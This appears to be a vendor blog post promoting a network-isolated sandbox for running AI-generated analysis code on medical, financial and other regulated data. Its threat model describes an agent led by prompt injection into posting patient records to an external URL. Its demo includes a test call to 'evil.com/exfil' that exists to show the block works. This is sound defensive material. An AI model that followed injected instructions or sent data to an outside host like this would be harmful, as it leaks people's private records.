Air-gapped sandboxes: run LLM-generated analysis on PII / PHI / financial data without leaking it

The fastest way to make your lawyer uncomfortable: "we’re going to let GPT-5 run Python on our customer’s PHI." The combination of regulated data + AI-generated code + anything that touches the internet is a compliance landmine.

But the underlying need is real: your agents could do genuinely useful work on sensitive data — summarize medical records, flag anomalies in financial transactions, generate personalized recommendations — if only there were a way to run the generated code without the data ever leaving your perimeter.

That’s the case for air-gapped sandboxes. A Podflare sandbox launched with egress=False has full Python / Linux / compute capability and zero outbound network. The LLM generates the code. The sandbox runs it against data you explicitly upload. The results come back to you. Nothing else moves.

What egress=False actually does

from podflare import Sandbox

with Sandbox(egress=False) as sb:
    sb.upload(local_bytes, "/data/patients.parquet")
    out = sb.run_code("""
        import pandas as pd
        df = pd.read_parquet('/data/patients.parquet')
        # Model-generated analysis code runs here
        print(df.groupby('dx_code').age.describe())
    """)
    print(out.stdout)

At the host level, here’s what changes:

• The guest’s eth0 interface is still up, but the tap device on the host side is detached from the host bridge.
• Every outbound packet from the guest dies at the host with no L2 peer. DNS fails. TCP SYNs go nowhere. Even UDP is dropped.
• The guest thinks it has network (the stack is configured, DHCP lease is present from snapshot) but nothing reaches the internet.

This is stronger than a firewall rule. The guest does not have a route. No user-space firewall, iptables rule, or cgroup network policy is involved. The isolation is at the L2 level, implemented in the host hypervisor path, and can’t be bypassed from inside the guest.

The threat model this closes

Regulated data workflows usually worry about three distinct exfiltration paths:

1. The model exfiltrates the data via generated code

The agent is asked to analyze 10,000 patient records. Either through prompt injection or a misaligned system prompt, it writes Python that POSTs the records to an external URL. In a normal sandbox with network access, the POST succeeds.

With egress=False, the POST fails. No DNS resolution, no TCP connection. The data stays on the sandbox’s disk, which is destroyed with the VM.

2. A compromised dependency exfiltrates at install time

Agent runs pip install some-stats-lib. The package contains exfiltration logic in its setup.py. Normally the package would be installed from PyPI and could POST its findings anywhere.

With egress=False, pip install itself fails (no network to reach PyPI). Which means you pre-populate the sandbox with exactly the dependencies you’ve vetted, and no others. A stronger supply-chain posture by construction.

3. Sandbox-to-host or sandbox-to-sandbox lateral movement

Pod-level hardware isolation already prevents cross- tenant visibility. egress=False extends that: the sandbox has no route to your internal network, your databases, your internal APIs. Even if Podflare’s own control plane were compromised, a sealed sandbox stays sealed.

Real workflows that use this pattern

HIPAA-covered analysis

A healthcare startup uses Podflare to let clinicians ask natural-language questions about a patient cohort. The agent is allowed to generate + run Python to answer; egress=False is mandatory. Patient records are uploaded per-session from the clinician’s authenticated portal. Results return. Sandbox destroyed. The data never crossed the public internet and never sat in any AI-tool vendor’s logs.

Financial-sector model evaluation

Risk team wants to evaluate a trading model against last quarter’s trades. Trades are confidential. egress=False sandbox; trades uploaded directly from internal storage; agent generates evaluation Python; aggregate metrics come back to the risk dashboard. No single-trade data leaves the sandbox.

Academic research on restricted datasets

Researcher has access to a restricted-use dataset (census microdata, hospital discharge records) and wants to accelerate analysis with AI agent help. Data contract forbids the data crossing any internet boundary. egress=False sandbox satisfies the contract while letting the agent write Python freely.

Enterprise document analysis

Company’s legal team wants agent-driven contract analysis. Contracts contain customer data, unreleased product plans, trade secrets. egress=False is the guardrail that lets them actually ship the agent instead of getting stuck in a year-long security review.

Composing with data residency

egress=False prevents data from leaving the sandbox. Region pinning ensures the sandbox itself is in the right geographic jurisdiction:

# EU-only for GDPR
sb = Sandbox(egress=False, region="eu")   # Hetzner Helsinki

# US-only for FedRAMP-adjacent workloads
sb = Sandbox(egress=False, region="us-east")   # Latitude Ashburn

Combined, the data stays in the EU (or US, or SG) for its entire life cycle — uploaded into a region-pinned sandbox, processed by code running in that region, destroyed with the sandbox at the end of the session.

What you give up

Being honest about tradeoffs:

• No pip install inside the sandbox. You pre-bake dependencies into the base image (via Podflare templates) or upload wheels per session. Most data-analysis workflows need a stable set of libraries, so this usually just means "curate a template once."
• No external API calls. No fetching real-time data, no calling OpenAI from inside the sandbox, no hitting your internal services. Everything the sandbox needs must be uploaded at session start.
• No auto-updates. Linux package manager in the sandbox can’t reach its repos. Fine for short-lived sandboxes; for long-lived ones, plan update cycles through template rebuilds.

The alternative is usually worse

The three other patterns we see teams try, and why air-gapped sandbox usually wins:

• Run on a VPC-isolated EC2 instance. Heavy ops burden — you manage the VM, patching, pool sizing, cold starts. Usually ends up with 5-second cold starts that kill agent UX.
• Self-host E2B behind a firewall. Gets you microVM-level isolation but not the managed warm pool, haversine routing, or 5-region scale. Ops cost is non-trivial. E2B doesn’t expose fork(n).
• On-prem K8s cluster with a container-per-task. Gets you isolation from the internet, but container isolation from other containers on the same node is weaker than microVM. Plus cold start is measured in seconds, not hundreds of milliseconds.

Enterprise path for stricter requirements

For workloads that can’t run on our shared infrastructure at all, Podflare Enterprise offers dedicated hostd pools — a physical machine allocated only to your organization, so even the hypervisor isn’t shared with any other tenant. On-prem deployment is on the roadmap. Email sales@podflare.ai with your requirements; we respond within a business day.

Try the pattern

pip install podflare
export PODFLARE_API_KEY=pf_live_...

python -c "
from podflare import Sandbox

with Sandbox(egress=False, region='eu') as sb:
    sb.upload(b'name,age\nAlice,30\nBob,45', '/data/roster.csv')
    out = sb.run_code('''
        # Try to exfiltrate — this will fail
        import urllib.request
        try:
            urllib.request.urlopen('https://evil.com/exfil', timeout=1)
        except Exception as e:
            print('egress blocked:', type(e).__name__)
        # But local compute still works
        import csv
        with open('/data/roster.csv') as f:
            rows = list(csv.DictReader(f))
        print('rows:', len(rows))
    ''')
    print(out.stdout)
"

Expected output: egress blocked: URLError / rows: 2. Exfiltration failed; local compute worked. That’s the shape.

Related reading

• AI coding agent credential-leak threat model
• Why Docker isn’t enough
• Podflare’s security model — isolation, egress, compliance roadmap.